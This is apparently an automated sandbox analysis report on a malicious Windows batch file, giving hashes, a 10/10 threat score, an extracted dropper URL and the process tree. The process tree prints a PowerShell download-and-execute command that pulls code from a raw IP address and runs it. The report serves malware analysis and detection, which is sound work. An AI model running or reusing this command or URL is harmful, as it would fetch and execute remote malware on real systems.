Analysis
-
max time kernel
131s -
max time network
67s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
16-05-2020 02:10
Static task
static1
Behavioral task
behavioral1
Sample
ce9dc8d828e18ce089cc6d84d08fe452.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
ce9dc8d828e18ce089cc6d84d08fe452.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
ce9dc8d828e18ce089cc6d84d08fe452.bat
-
Size
219B
-
MD5
2d905313dbc56c967f83d1426a7df00c
-
SHA1
44f27a3aa997e1cb05864f2bfd2ec0da5f1ea539
-
SHA256
7442acba79bb7e085e7198a9bdc242d324676559fb316ab487018457b4e0260c
-
SHA512
05e139eea56972f817f4583326ec6a448e3f93c74268ba6ea310f4dd879716340843ff33dc9b970895c02fb72ee0db7c28accb07eb64a1b847d3fdddfe14b32b
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/ce9dc8d828e18ce089cc6d84d08fe452
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2440 1928 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2440 WerFault.exe Token: SeBackupPrivilege 2440 WerFault.exe Token: SeDebugPrivilege 2440 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe 2440 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ce9dc8d828e18ce089cc6d84d08fe452.bat"1⤵PID:1732
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ce9dc8d828e18ce089cc6d84d08fe452');Invoke-PRBSJMAYEWZY;Start-Sleep -s 10000"2⤵PID:1928
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1928 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2440